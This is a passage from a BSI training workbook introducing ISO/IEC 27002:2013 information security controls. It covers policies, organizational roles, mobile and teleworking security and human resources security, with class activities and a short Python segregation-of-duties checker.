
ISO 27002 2013 Introduction

TRAINING COURSE
ISO/IEC 27002:2013 Information Security Controls
Introduction Training Course
British Standards Institution
BSI Group (Thailand) Co., Ltd.
Welcome to BSI Training.

Why train with us?
We understand that business success starts with people and we’ve assessed thousands of businesses, applying the same standards to each, so we can genuinely benchmark performance. We have also trained many auditors who carry out these assessments and know we can take you from beginner to certification to expert quickly – wherever you are on your learning journey, we can tailor training to you and your business.

FREE Learn Plus resource
We recognize that learning is a continual process and doesn’t just stop once you’ve completed your training. With this in mind, we offer FREE additional webinars and eLearning resources on many of our courses. Look out for our special icon that indicates your training course comes with your FREE ‘Learn Plus’ resources. They’ll be sent to you by email two months after you’ve completed your training course.

Our approach
Within our training courses we use accelerated learning techniques to help you progress naturally and quickly. We encourage interaction and collaboration because the more involved you are, the more positive the outcome. We also keep the courses varied and put your learning in context to give you an enjoyable, successful and satisfying experience.

Our tutors
Turn our experience into your expertise with industry leading professionals. Our tutors are recognized as leaders in their field, offering a first-class learning experience. They are trained to understand and meet your different learning needs, and they have years of industry experience. What’s more, our tutors train assessors who look at your organization to keep your learning in line with your company’s accreditation.
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
(Prerequisites reminder to delegates)
We recommend that you have a basic understanding of information security principles and
terminology.
We also recommend that you have an understanding of the information risks faced by your
organization.
A basic understanding of ISO/IEC 27001:2013, information technology and information risk
management may be an advantage.
Some delegates on this course will have already attended our Information Security Management
System (ISMS) Requirements of ISO 27001:2013, or Information Security Management System
(ISMS) Implementing ISO/IEC 27001:2013 course.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
1
Please observe the following key points:
For your personal safety, please be aware of the emergency exits from your classroom and the
building.
The tutor will inform you of the nearest restrooms.
Please do not leave valuable items unattended in the classroom. Keep them with you or make other
arrangements for their safekeeping.
Please be considerate of other delegates, and avoid distractions from the beeping/flashing of your
mobile phone.
Please do not use recording devices since they may restrict free discussion.
The tutor will inform you of the lunch and break schedule. Please return to class on time.
The tutor will inform delegates of any area(s) known to be available for smoking.
If there are any special needs please confirm these now.
By attending this BSI training course, you will become familiar with a typical framework for information
security that is intended to help an organization implement, maintain, and improve its information security
management. This knowledge should form a sound basis for your implementation efforts and significantly
benefit your organization.
This course is aimed at assisting you to understand the guidance provided within ISO/IEC 27002:2013 for
selecting controls when implementing an information security management system (ISMS) based on
ISO/IEC 27001 or implementing commonly accepted information security controls. Such controls will
enable your organization to comply with any applicable legislation and regulations and better protect
information.
You will personally benefit from being able to recognize where adjustments might need to be made to
protect information within your organization.
Your own knowledge of the key concepts and requirements of ISO/IEC 27002:2013 will increase from an
implementation perspective, and you will also gain the skills to conduct your own baseline review of
your organization’s current position with information security, and to implement key concepts and
requirements relating to ISO/IEC 27001 and ISO/IEC 27002.
Your learning will be through an activity-based, delegate centred approach. This will help you share
experiences and knowledge with other attendees; bringing alive the information presented, resulting in
enhanced retention and application to your own workplace.
Our engaging, action-packed learning programmes are designed to transform the very culture of technical
training delivery. We inspire imagination through creation, not consumption.
By getting you involved from the start, you will develop your own knowledge and skills at a pace that suits
you. We use the most advanced teaching and learning method in use today. Based on the latest brain
research, our accelerated learning approach has proved again and again to increase learning effectiveness
while saving time and money in the process.
At BSI Training Academy, you have the full support and guidance of a world-class BSI tutor at your
disposal. We hope you enjoy the course and secure valuable knowledge and skills that you can
immediately apply within your workplace.
The tutor will now explain the course aim.
ISO/IEC 27002 is the internationally recognized standard of good practice for information security
controls. ISO/IEC 27002’s lineage stretches back more than 30 years to the precursors of BS 7799.
ISO/IEC 27001 is a standard that provides the requirements for establishing, implementing,
maintaining and continually improving an information security management system (ISMS). In Annex
A, ISO/IEC 27001 provides details of best practice information security control objectives and controls
for organizations to consider. Implementation guidance for these information security controls is
provided in ISO/IEC 27002.
During this training, ISO/IEC 27002 control implementation guidance will be discussed and ISO/IEC
27001 will be used as a reference tool for context setting.
Your tutor(s) will introduce themselves.
Your turn:
• Delegate name?
• Organization and product or service?
• Job position or role?
• Experience of information security or risk management?
• Based on your experience and observations in the workplace, what are your perceptions of the
risks associated with information security?
• Any specific questions/problems to be answered/expectations from the course?
• Something interesting about YOU?
Learning objectives outline what delegates will know and be able to do by the end of the course.
On completion, successful delegates should gain the knowledge and skills outlined in this slide:
Knowledge
Delegates will be able to describe the background and purpose of ISO/IEC 27002 and will understand
its scope and structure. One of the main learning objectives of the course is for the delegates to gain
knowledge associated with each of the different best practice controls recommended by the standard
and the benefits of implementing them.
Skills
Delegates will be able to utilize their new understanding and knowledge to choose the most
appropriate controls for improving and maintaining information security, and to implement them
within their organizations, whether as a standalone exercise or as part of implementing an information
security management system (ISMS) in line with ISO/IEC 27001.
This course includes a detailed Delegate Workbook, practical activities and tutorial sessions.
The contents of the Delegate Workbook include an agenda, slides and associated notes (like these),
activities, references and a toolkit.
Contents of the toolkit are also provided to you on a memory stick.
Please note: The contents of the toolkit are purely examples. BSI is not approving these
examples, or stating they conform to the requirements of the standard.
EXAMPLES ARE FOR REFERENCE PURPOSES ONLY.
Model answers to activities (contained in the References Section) are included for reference only after
attempting the activity, and not for copying from during the activities. The activities are designed to
increase understanding of the key learning points, and for delegates to look at the answers prior to
the activity will undermine this objective.
Delegates are encouraged to participate, experiment and question in a stress-free environment.
Any questions?
What is its purpose?
ISO/IEC 27002 is a code of practice - a universal, advisory document, not a formal specification such
as ISO/IEC 27001. It provides best practice recommendations on information security management
for use by those responsible for initiating, implementing or maintaining information security
management systems (ISMS).
Organizations that adopt ISO/IEC 27002 must assess their own information risks, clarify their control
objectives and apply suitable controls (or other forms of risk treatment) using the Standard for
guidance.
Where did it come from?
The ISO/IEC 27000 standards are descended from a corporate security standard donated by Shell to
a Department for Trade and Industry initiative in late 1989/early 1990. The Shell standard was
developed into British Standard BS 7799 in the mid-1990s, and was adopted as ISO/IEC 17799 in
2000. The ISO/IEC standard was revised in 2005, and renumbered ISO/IEC 27002 in 2007 to align
with the other ISO/IEC 27000 series standards. It was revised again in 2013.
Scope
Within the Code of Practice there is a set of security fields. These contain 35 control objectives with
over 100 best-practice information security control measures recommended for organizations to
satisfy the control objectives and protect information assets against threats to confidentiality, integrity
and availability.
The Standard is divided into 14 different security control clauses, namely:
• Clause 5: Information security policies
• Clause 6: Organization of information security
• Clause 7: Human resources security
• Clause 8: Asset management
• Clause 9: Access control
• Clause 10: Cryptography
• Clause 11: Physical and environmental security
• Clause 12: Operations security
• Clause 13: Communications security
• Clause 14: System acquisition, development and maintenance
• Clause 15: Supplier relationships
• Clause 16: Information security incident management
• Clause 17: Information security aspects of business continuity management
• Clause 18: Compliance
The order in which these clauses are presented is not significant, and any other lists that exist within the
standard are not presented in any kind of priority order.
Organizations should determine which clauses and associated controls are important for them to
implement based on the benefit obtained by doing so. If using this standard as an aid for implementing
controls associated with an ISMS based on ISO/IEC 27001, then the management system requirement for
controls will be based on a risk management process.
The clauses are further subdivided into 35 main security categories, each of which contains a control
objective. The controls recommended to meet the objective are listed beneath each of the main categories,
and there are 114 controls in total.
For each control, ISO/IEC 27002 provides extensive ‘implementation guidance’ and for certain controls
‘other information’ which provides broader advice and considerations around that specific control.
Activity 1: Information security related terms and definitions
Purpose:
Familiarization with terms and definitions used in information security and ISO/IEC 27002.
Duration:
20 minutes in groups
10 minutes feedback and discussion
Directions:
In this activity, you will be split into groups by your tutor.
Each group will be provided with 2 sets of flashcards (terms and definitions). Each group is required
to pair the correct term to the definition.
5.1 Management direction for information security
Objective: To provide management direction and support for information security in accordance with
business requirements and relevant laws and regulations.
5.1.1 Policies for information security
A set of policies for information security should be defined, approved by management, published and
communicated to employees and relevant external parties.
It is important that all persons working under the control of the organization and any interested third
parties are informed of the organization’s strategy for dealing with information security. To that end,
it is important for the organization to publish a high level information security policy document which
sets out the approach to managing the information security objectives it has defined. The information
security policy should be approved at the highest level of the organization (e.g. CEO or board level).
A number of things can influence the organization’s approach to managing its information security,
including:
• Business strategy
• Regulations, legislation and contracts
• The current and projected information security threat environment
Within the information security policy, there should be statements which include:
• A definition of information security, objectives and principles to guide all activities relating to
information security
• Assignment of general (e.g. users) and specific (e.g. information security manager, internal
auditor, CEO etc.) responsibilities for information security management to defined roles
• Processes for handling deviations and exceptions (e.g. the use of a disciplinary process or a
specific process for handling exceptions to policy)
The information security policy should ideally be brief and concise, typically only a few pages
long. In turn, it is supported by subject specific security policies which mandate the implementation
of more precise practices and controls. These supporting documents tend to be targeted at a
particular audience (e.g. technology experts, or departments) or cover a particular topic (e.g. access
control, cryptography).
It is important that all policies are communicated to those people who are required to comply with
them and this means not only employees and contractors but relevant third parties as well. They
should be communicated in such a way that makes them accessible and understandable. The content
of policies should be included in any information security awareness, education and training
programme that the organization implements.
5.1.2 Review of the policies for information security
The policies for information security should be reviewed at planned intervals or if significant changes
occur to ensure their continuing suitability, adequacy and effectiveness.
It is also important to ensure that policies are reviewed for accuracy and appropriateness on a
regular basis (e.g. annually) as well as in response to certain triggers such as changes to the
legislative, contractual or regulatory environment, changes to the threat landscape, changes in
technology, changes in business processes etc. Once reviewed and updated, the policies should be
reapproved for use.
Activity 2: Information security policy
Purpose: Identify missing elements in information security policy.
Duration:
15 minutes in pairs
15 minutes feedback
Directions:
In pairs, fill in the missing words (within the blank boxes) to complete the sample information
security policy over the page.
SAMPLE INFORMATION SECURITY POLICY
1. Purpose
To define the policy requirements for information security within ABC Organization Ltd
2. Scope
Information takes many forms. The scope of this Information Security Policy includes, but is not
limited to:
• All information processed by ABC Organization in pursuit of its operational activities, regardless
of whether it is processed electronically or in paper form, including but not limited to:
o External customer products, materials, information and reports
o Operational documents, plans, and minutes
o Financial and compliance records
o Employee records
• All information processing facilities used in support of ABC Organization’s operational activities
to store, process and transmit information
• All external organizations that provide services to ABC Organization in respect of information
processing facilities.
3. Definitions
Information security protects the following three attributes of ABC Organization’s information:
• ________ – Property that information is not made available or disclosed to
unauthorized individuals, entities, or processes
• ________ – Property of protecting the accuracy and completeness of assets
• ________ – Property of being accessible and usable upon demand by an
authorized entity
Other definitions applicable to this policy:
• Employees – ABC Organization Ltd’s staff (permanent and temporary).
• Information ________ – Any information and information processing assets of
value to ABC Organization Ltd.
• Information ________ – An individual accountable for the information asset.
• Information processing facilities – Any information processing system, service or infrastructure,
or the physical locations housing them.
4. Risks
Lack of information security can lead to ________ such as breach of
confidentiality, the corruption or unavailability of information which could affect ABC Organization’s
(and its customers’) financial results, compliance with ________ and ________, reputation, and
ability to trade.
Without defined and measurable ________, it is not possible to determine whether ABC
Organization Ltd’s information security activities are effective and efficient.
5. Objectives
The objective of this information security policy is to enable ABC Organization Ltd to effectively
manage its information security threats in order to support its business strategy and maintain its
legal, regulatory, internal and contractual compliance obligations.
ABC Organization Ltd’s security controls cover all threats, whether external or internal, deliberate or
________.
Compliance with this information security policy is necessary to ensure business continuity, and
minimize business damage by preventing the occurrence, and minimizing the impact, of information
security incidents.
In support of this information security policy, the board of ABC Organization accepts its role in being
fully accountable for information security and is committed to:
• Managing and reducing ________ in an informed manner
• Minimizing ________ on the organization when information security incidents
occur
• Ensure the organization has identified the legal requirements and they are complied with.
6. ________
ABC Organization’s Executive shall be accountable for ensuring that appropriate security and
compliance controls are identified, implemented and maintained by information owners. They shall be
supported in this task by the Information Security Forum (ISF).
The role and responsibility for managing information security at an operational level shall be
performed by the ________. The ________ has direct
responsibility to the ISF for maintaining this Information Security Policy, and providing advice and
guidance on its implementation.
Information owners within ABC Organization shall be responsible for the identification,
implementation and maintenance of controls that are commensurate with the ________ of the
information assets they own and the risks to which they are exposed.
It is the responsibility of ________ to adhere to
this Information Security Policy.
Non-compliance with the Information Security Policy by any employee shall result in ________.
7. Policy
7.1 Information security
This Information Security Policy provides that ABC Organization Ltd shall ensure that:
• Information assets and information processing facilities shall be protected against unauthorized
access
• Information shall be protected from unauthorised disclosure
• Confidentiality of information assets shall be a high priority
• Integrity of information shall be maintained
• ABC Organization Ltd requirements, as identified by information owners, for the availability of
information assets and information processing facilities required for operational activities shall
be met
• Statutory, and expressed and implied legal obligations shall be met
• Regulatory, contractual and internal compliance obligations shall be met
• Requirements for the continuity of information security shall be determined and maintained
within ABC Organization Ltd’s ________ arrangements
• Unauthorized use of information assets and information processing facilities shall be prohibited;
the use of obscene, racist or otherwise offensive statements shall be dealt with in accordance
with other policies published by ABC Organization Ltd
• This information security policy shall be communicated to all employees for whom information
security ________ shall be given
• A systematic approach to information security ________
shall be followed and shall be a dynamic and continual process
• Information security shall be managed through a formal Information Security Management
System (ISMS) that shall be defined within a documented framework
• All breaches of information security, actual or suspected, shall be reported and investigated in
line with ABC Organization Ltd’s published policies
• Controls shall be commensurate with the risks faced by ABC Organization Ltd
In support of this information security policy, more detailed operational security policies and
processes shall be developed for employees, information assets and information processing facilities.
These policies shall be ________ at planned intervals or if significant changes occur
to ensure their continuing suitability, adequacy and effectiveness.
7.2 Deviations and exceptions
Any deviations from this policy must be authorized by ABC Organization Ltd’s ISF. Exceptions and
deviations shall be managed through ABC Organization Ltd’s incident management or change
management processes.
8. Key performance measures
Information security objectives shall be agreed on an annual basis, supported by a set of key
performance indicators (KPIs), with milestones and targets. These measures shall be reported to the
ISF for review.
9. Review and maintenance
This information security policy shall be reviewed ________ by the ________
to ensure it remains fit for purpose.
10. References
• ISO/IEC 27000:2013 Information technology – Security techniques – Information security management systems – Overview and vocabulary (ISO 27000)
• BS ISO/IEC 27001:2013 Information technology – Security techniques – Information security management systems – Requirements (ISO 27001)
• BS ISO/IEC 27002:2013 Information technology – Security techniques – Code of practice for information security controls (ISO 27002)
11. Change history
Issue1
27 August 2017
- First published
6.1 Internal organization
Objective: To establish a management framework to initiate and control the implementation and
operation of information security within the organization.
6.1.1 Information security roles and responsibilities
All information security responsibilities should be defined and allocated.
It is important to ensure that roles and responsibilities within the organization are defined where
those roles have the ability to affect information security. In general, this is likely to be split into three
types of roles:
• Group roles such as those performed by committees and forums, e.g. information security forum
or risk and audit committee
• Specific roles as performed by an individual, e.g. information security manager, or individuals with
the same role, e.g. database managers, network support analysts etc.
• General roles such as users, customers etc.
Once the roles are defined, they are likely to be published in the Information Security Policy so that
everyone is aware of the information security responsibilities throughout the organization.
6.1.2 Segregation of duties
Conflicting duties and areas of responsibility should be segregated to reduce opportunities for
unauthorized or unintentional modification or misuse of the organization’s assets.
One of the traditional business areas/functions where segregation of duties can be found is within
finance, where it is considered best practice that no single person is able to: add a new supplier to
the system, raise a purchase order for that supplier, authorize the purchase order, process an
invoice and authorize payment. If one individual has all of these capabilities then the conditions exist
for fraud to occur. We sometimes find that in certain organizations, privileges are given to individuals
without thought being given to the consequences of potentially conflicting duties or where there is the
opportunity for unauthorized or unintentional modification or misuse of the organization’s information
assets. As such, organizations need to take care to ensure that no individual can access, modify or use
assets without authorization or detection. Naturally, segregation can be more challenging in smaller
organizations and this is where other compensating controls, such as auditing and monitoring, need to
be considered.
One area where segregation of duties is important is in software development. No single individual should
be able to write code within the development environment and then go on to authorize its release into
production. If this situation exists then back doors, trapdoors and other malicious software could more
easily find their way into the live environment.
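The purchase-to-pay chain and the code-then-release case above are both "toxic combinations" of duties that can be checked mechanically from an entitlement export or a change record. The Python below is an added example written for this page, not code from the course or from ISO/IEC 27002; the duty names, the conflict pairs, the user names and the change identifier are constructed assumptions. It reports every user who holds two conflicting duties, and implements a release gate that discounts approvals given by the change's own authors, which is the software-development case in the text. The same report doubles as the "auditing and monitoring" compensating control mentioned for smaller organizations where full separation is impractical.

```python
"""Segregation-of-duties (SoD) checks for ISO/IEC 27002 6.1.2.

1. A toxic-combination report over a user -> duties snapshot.
2. A release gate that refuses a change unless enough approvers are not
   among its authors.
Duty names, conflict pairs and users below are constructed for illustration."""
from dataclasses import dataclass
from itertools import combinations
from typing import Dict, FrozenSet, List, Set, Tuple

# Constructed conflict matrix (assumption): the two duties in each pair must
# never be held by the same identity. Mirrors the purchase-to-pay chain and
# the "writes code, then approves its own release" case discussed above.
CONFLICTING_DUTIES: Set[FrozenSet[str]] = {
    frozenset({"raise_po", "authorize_po"}),
    frozenset({"add_supplier", "authorize_payment"}),
    frozenset({"process_invoice", "authorize_payment"}),
    frozenset({"write_code", "approve_release"}),
}


def sod_violations(entitlements: Dict[str, Set[str]]) -> List[Tuple[str, str, str]]:
    """Return (user, duty_a, duty_b) for every conflicting pair a user holds.

    Output is sorted (by user, then duty_a < duty_b) so reports are stable.
    """
    found: List[Tuple[str, str, str]] = []
    for user, duties in sorted(entitlements.items()):
        for a, b in combinations(sorted(duties), 2):
            if frozenset({a, b}) in CONFLICTING_DUTIES:
                found.append((user, a, b))
    return found


@dataclass(frozen=True)
class ReleaseRequest:
    change_id: str
    authors: FrozenSet[str]    # identities that committed code in the change
    approvers: FrozenSet[str]  # identities that approved release to production


def release_gate(req: ReleaseRequest, min_independent: int = 1) -> Tuple[bool, str]:
    """Allow the release only if enough approvers are not among the authors.

    Self-approvals are discarded rather than failing the request outright, so
    a change with one author-approver plus one independent approver passes.
    """
    independent = req.approvers - req.authors
    if len(independent) < min_independent:
        return False, (f"{req.change_id}: {min_independent} independent approver(s) "
                       f"required, got {len(independent)}; self-approvals ignored: "
                       f"{sorted(req.approvers & req.authors)}")
    return True, f"{req.change_id}: approved by {sorted(independent)}"


if __name__ == "__main__":
    # Constructed entitlement snapshot, as an ERP or CI system might export it.
    snapshot = {
        "alice": {"raise_po", "authorize_po"},                            # toxic pair
        "bob": {"write_code"},
        "carol": {"write_code", "approve_release", "process_invoice"},    # toxic pair
    }
    for user, a, b in sod_violations(snapshot):
        print(f"SoD violation: {user} holds both {a!r} and {b!r}")
    ok, why = release_gate(ReleaseRequest("CHG-1", frozenset({"bob"}), frozenset({"bob"})))
    print(ok, why)
```

Run the file directly to print the report for the constructed snapshot. In practice the snapshot would be built from the ERP's user-role export or from the version-control system's commit and review metadata, and the conflict matrix would be owned alongside the access control policy so that new duties are classified before they are granted.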
6.1.3 Contact with authorities
Appropriate contacts with relevant authorities should be maintained.
As part of the roles defined within the organization (as discussed in 6.1.1), consideration should be given to
who is authorized to make contact with different authorities and under what conditions. These authorities
can vary in nature and can include blue light emergency services (fire, ambulance, police etc.), health
authorities, government bodies, landlords, facilities companies (gas, water, electricity etc.), regulators, etc.
It is particularly important that there are clear guidelines in place in the event of reporting information
security incidents if it is suspected that laws have been broken or the organization is under some form of
cyber attack.
6.1.4 Contact with special interest groups
Appropriate contacts with special interest groups or other specialist security forums and professional
associations should be maintained.
In order to keep abreast of emerging information security threats it is essential that specific individuals
within the organization keep their specialist knowledge up to date in order to continue to perform their
duties effectively and protect information. For example, a Windows engineer will need to be aware of the
latest information on the Windows operating systems and the latest available patches etc. Keeping up to
date with the latest developments can be achieved through the use of email bulletin subscription services,
the use of forums and through networking. Organizations should be encouraging individuals to join and
participate in special interest groups.
6.1.5 Information security in project management
Information security should be addressed in project management, regardless of the type of the project.
Many project management frameworks have inbuilt risk management functions which enable project
managers to identify and mitigate risks to the project that could undermine its success. Organizations
should also ensure that such frameworks and methodologies include the opportunity for project
managers to identify the potential impacts on information (from a confidentiality, integrity and availability
perspective) that projects may pose. For example, if the project introduces a new information asset, it
should also identify the requirements for confidentiality (does the data need to be encrypted, for example),
integrity (what controls should be built into the system to prevent erroneous data input, for example) and
availability (what requirements are there for backups and how does this affect the current backup schedule,
for example). All of these considerations will add to the cost and potentially the timeline of the project
delivery and so need to be identified as soon as possible within the process.
6.2 Mobile devices and teleworking
Objective: To ensure the security of teleworking and use of mobile devices
6.2.1 Mobile device policy
A policy and supporting security measures should be adopted to manage the risks introduced by using
mobile devices.
Mobile computing offers significant benefits in productivity. It also introduces a range of risks to
information security.
Organizations need to be aware of the likelihood of information assets being transported outside the
confines of the office environment, to client sites, home and public spaces. Risk assessments need to
be conducted in order to identify the full extent of risks associated with mobile computing and should define a
set of rules and guidelines to ensure control over the security of information is maintained. These rules
should be documented in a mobile device policy that is published and communicated to all users to
ensure that they all understand what the rules are.
Users may be required to sign an end user agreement before mobile access to business information is
provided. These rules should include what information is allowed to be stored and communicated using
mobile devices and what information is not. These rules will go hand in hand with the requirements
defined in any classification policy and associated handling guidelines. Not only should the rules state
what information can be stored or processed on mobile devices but also what mobile devices are
allowed to be used. For example, is it acceptable for users to use their own computing devices (BYOD)
and smartphones (whether company or personally owned)? Are USB storage devices allowed and, if so,
what are the rules around how they should be used? Mobile users need to be aware of the security
precautions and measures they need to follow, e.g. using cryptographic techniques, never leaving
devices unattended, using Kensington locks, and separating private from business use.
Consideration will also need to be given to the almost inevitable scenario of a device being lost or
stolen, taking into account legal, insurance and other security requirements. Mobile users need to be
clear what actions need to be taken and when. Equally, the organization needs to
consider measures such as being able to remotely wipe the device, thus protecting the information
that may be stored on it. The resulting decisions from these considerations need to be clearly
documented and communicated, with regular training provided to the relevant individuals.
6.2.2 Teleworking
A policy and supporting security measures should be implemented to protect information accessed,
processed or stored at teleworking sites.
As stated in 6.2.1, many organizations have a mobile workforce, but consideration should not only be
given to the mobile devices in use but also to the conditions and environment where mobile working
and teleworking are taking place, typically a user’s home, in order to protect information being
accessed, processed or stored. A policy needs to be developed and issued which defines the
conditions and restrictions for teleworking. Clause 6.2.2 provides a list of considerations for
determining the appropriateness of teleworking, which includes:
• Physical security of proposed site
• Communications security requirements
• Threat of unauthorised access by family and friends
• Malware protection
• Software licensing agreements
• Legal considerations
• Health and safety aspects of homeworking
Once all relevant factors have been identified and considered, guidelines, arrangements, policies and
procedures should be implemented to protect the organization’s information assets and the health
and safety of the teleworker, including:
• Provision of suitable equipment
• Definition of work permitted and hours of work
• Physical IT and communications security
• Business continuity considerations
• Revocation of authority and access rights and return of assets when teleworking is terminated
Activity 3: Organization of information security
Purpose: Assign information security responsibilities to roles within an organization.
Duration:
15 minutes in groups
15 minutes feedback and discussion
Directions:
Using a flipchart, in groups assigned by the tutor, review both the example organization chart and a
list of organizational information security responsibilities provided over the next two pages and then
complete the tasks below. When you have completed the tasks, the tutor will facilitate a class-wide
discussion:
Part 1 – To which role or group of roles in the organization chart does each of the four sets of
responsibilities apply?
Part 2 – Which roles from the organization chart should be members of the information security
forum?
Part 3 – From a best practice perspective, to whom in the organization chart should the information
security manager report?
Responsibilities
Responsibilities 1:
• Provide visible top commitment for security
• Accountable for organization wide information security management system
• Approve corporate information security policy
• Approve organization risk appetite
Responsibilities 2:
• Determine strategic security planning
• Initiate development of security policies
• Review effectiveness of information security
• Approve resources
Responsibilities 3:
• Responsible to senior managers for day-to-day security
• Implement security consistent with business requirements
• Ensure staff availability for security education and training
• Support incident investigations
Responsibilities 4:
• Adhere to security policies
• Keep organisation’s information confidential
• Be aware of security implications of their actions
• Report suspicious behaviour and security incidents
Example organization chart (figure; reporting lines are not reproduced in text). Roles shown: Executive; Information security forum; Legal advisor (external); Compliance Director; Internal auditor (vacancy); HR Director; Learning and development manager; Trainer; Trainer; Payroll manager; Payroll officer; Payroll officer (vacancy); IT Director; Head of information security; Web development manager; Developer; Tester; IT operations manager; Firewall administrator (vacancy); Database manager.
7.1 Prior to employment
Objective: To ensure that employees and contractors understand their responsibilities and are suitable
for the roles for which they are considered.
7.1.1 Screening
Background verification checks on all candidates for employment should be carried out in accordance
with relevant laws, regulations and ethics and should be proportional to the business requirements, the
classification of the information to be accessed and the perceived risks.
One of the biggest threats to information security is user error. There are many reasons why errors
occur but one way in which the number of errors can be reduced is by ensuring that users are
competent to perform the duties of the role they have been given. For users who are already employed
within the organization, errors can be reduced by implementing an ongoing training and awareness
programme. However, it is important to think about how competency can be addressed, even before a
person is offered a role. One of the ways is by conducting appropriate background screening on
applicants for different roles. Screening should be commensurate with the skills, competencies and
experience associated with the duties of a specific role. Some of these could be soft skills such as
communication skills and effective people management skills, but they could also be technical skills for
roles such as database engineers and software engineers.
There are other aspects of background screening that also need to be considered, depending upon the
type of organization, the type of role and the type of information the user will have access to. For
example, if the organization is in the finance industry or the user will have access to financial
information, especially where this relates to the movement of funds or access to the organization’s or
another’s funds or other finance related products (e.g. bank account or credit card information), then
financial background checks are likely to be beneficial. For some roles criminal records checks may be
necessary. For those individuals working in government or who will have access to government
information then security services clearance checks may need to be performed.
In most organizations, a number of basic checks are likely to be performed including:
• ID checks
• Character references
• Residence checks
• Employment history
• Credit review / criminal history
• Education
• Eligibility to work (for example when employing foreign workers)
Some form of screening may also be required if an individual changes role within an organization
where he or she subsequently has access to sensitive or confidential information. An appropriate
screening process also needs to be conducted for contractors.
Consideration also needs to be given to the suitability of the individuals conducting the screening and
how the process should be carried out. Any screening process needs to be conducted in accordance
with the relevant legislation and candidates need to be informed beforehand of any screening
activities.
7.1.2 Terms and conditions of employment
The contractual agreements with employees and contractors should state their and the organization’s
responsibilities for information security.
All employees and contractors need to be made aware of their responsibilities to protect the
information assets of the organization. One of the ways in which this can be achieved is through
contractual agreements, e.g. terms and conditions of employment. In general, contractual obligations
should reflect the organization’s policies for information security and clearly state:
• The need to sign non-disclosure or confidentiality agreements prior to accessing or processing
confidential information
• How to handle personally identifiable information and information received from third parties
• Legal responsibilities and rights e.g. regarding data protection legislation and protecting
intellectual property rights
• Specific policies that need to be complied with, e.g. information security policy and acceptable use
policy
• Responsibilities for classification of information
• Consequences of disregarding information security responsibilities, e.g. invocation of the
organization’s disciplinary process.
Ideally, information security responsibilities need to be communicated to future employees during the
pre-employment process.
Consideration should also be given within contractual agreements to extending responsibilities for a
defined period beyond the end of employment.
7.2 During employment
Objective: To ensure that employees and contractors are aware of and fulfil their information security
responsibilities
7.2.1 Management responsibilities
Management should require all employees and contractors to apply information security in
accordance with the established policies and procedures of the organization.
In 6.1.1 we stated that the information security responsibilities should be defined for those roles that
could have an impact on an organization’s information security. Any line management role is one that
should be considered for inclusion within this process. Line managers have a responsibility to ensure
that any individuals (employees and contractors) reporting to them are complying with the
organization’s policies. Managers need to ensure those reporting to them are fully briefed on their
information security roles and responsibilities and what is expected of them in terms of working
practices. Management needs to ensure that employees and contractors are competent to carry out
their roles and responsibilities and ensure that any gaps are addressed through training and
education initiatives and that this process is conducted on an ongoing basis. There is also a key role
for management to play in creating a no-blame and positive climate where staff and contractors are
encouraged and motivated to suggest ways in which information security can be improved and where
incidents and ‘near misses’ are reported without fear of recrimination.
7.2.2 Information security awareness, education and training
All employees of the organization and, where relevant, contractors should receive appropriate
awareness education and training and regular updates in organizational policies and procedures, as
relevant for their job function.
As stated previously, user error is one of the biggest threats to information security, and lack of
competence is a major cause of information security breaches. It is not surprising that
information security education and training is widely regarded as one of the most effective security
measures and controls. All users within the organization should receive a level of training appropriate to
the level of impact they could have on information security. Many organizations follow a two stage
approach to training.
The first stage is where all users undertake a base level of training (often delivered through e-learning
mechanisms) in which all users within the organization receive training on high level policies, rules,
obligations and controls/measures that apply to everyone. Such common security procedures should
include password security, malware controls, preventing tailgating, handling visitors, maintaining clear
desks and clear screens, understanding information classification, etc. All staff need to be aware of
their accountability for their actions and inactions, and of the consequences, both to them individually and
to the organization, of not protecting information adequately. All users also need to be aware of
what to do in the event of incidents occurring and where they can go for advice and guidance.
The second stage is to identify those users who need more specialist knowledge and training, e.g.
Windows administrators or systems engineers who need a certain level of skill to ensure that the
systems they are responsible for are adequately protected.
Most organizations recognize that information security training should be provided as soon as
employees or contractors join the organization. Where many organizations fall short, is in providing
ongoing and regular training updates. Regular training is required to address such factors as:
• Changes in business operations, e.g. moving premises, introducing new business processes which
represent new information security risks.
• Changes to the threat landscape
• Changes to technology which will also impact how information security controls are implemented
• User complacency and forgetfulness
As such, training and education should be an ongoing programme and performed no less frequently
than annually.
To get the best results, the training methodologies used should also incorporate an element of
assessment, such as a quiz or an exam at the end or at various points through the training. This will
enable the organization to identify how effective the training has been and to what level the individuals
attending the training have understood the content. This will help identify users who require further
training and identify weaknesses in the training material that need to be addressed.
Training can be conducted internally or externally and can be general in nature or subject specific. For
example, it may be necessary to send technical staff on external vendor training courses or industry
body courses to ensure that skillsets are maintained. Training can also be formal classroom based with
a subject matter expert presenting the material, or can be conducted through team meetings or in the
office with material being presented by managers. Users should also be encouraged to do their own
research and study through reading books, magazines, posts on blog sites etc.
Certain role holders could also benefit from attending specific information security industry training
courses in order to attain a professional qualification.
Passing information security knowledge onto others can be done in more passive ways as well,
through awareness programmes. There are many ways to communicate information security
messages including:
• Poster campaigns
• Desktop calendars (information security message of the day)
• Competitions
• Newsletters
• Mouse mats
• Screensavers
7.2.3 Disciplinary process
There should be a formal and communicated disciplinary process in place to take action against
employees who have committed an information security breach.
Every organization needs to implement a formal and communicated disciplinary process to take
action against employees who have committed an information security breach. The disciplinary
process should be used as a deterrent to prevent employees from violating the organization’s
information security policies and procedures and any other information security breaches. Deliberate
breaches may require immediate actions. Naturally, the process should not be commenced without
first verifying that an information security breach has occurred (see 16.1.7).
It is essential that the disciplinary process ensures the correct and fair treatment for employees who
are suspected of committing breaches of information security. The process should provide for a
graduated response that takes into consideration factors such as the nature and gravity of the breach
and its impact on business, whether or not this is a first or repeat offence, whether or not the violator
was properly trained, relevant legislation, business contracts etc.
All information security policies should be linked to the disciplinary process and all users should be
made aware of the consequences of non-compliance.
Equally, organizations are advised to try and obtain a balance between the ‘carrot and the stick’ by
acknowledging and rewarding positive examples of good information security behaviour and working
practices.
7.3 Termination and change of employment
Objective: To protect the organization’s interests as part of the process of changing or terminating
employment.
7.3.1 Termination or change of employment responsibilities
Information security responsibilities and duties that remain valid after termination or change of
employment should be defined, communicated to the employee or contractor and enforced.
When a person is employed by an organization, certain agreements will be made between the organization
and the individual. These could include confidentiality statements and non-disclosure agreements. They
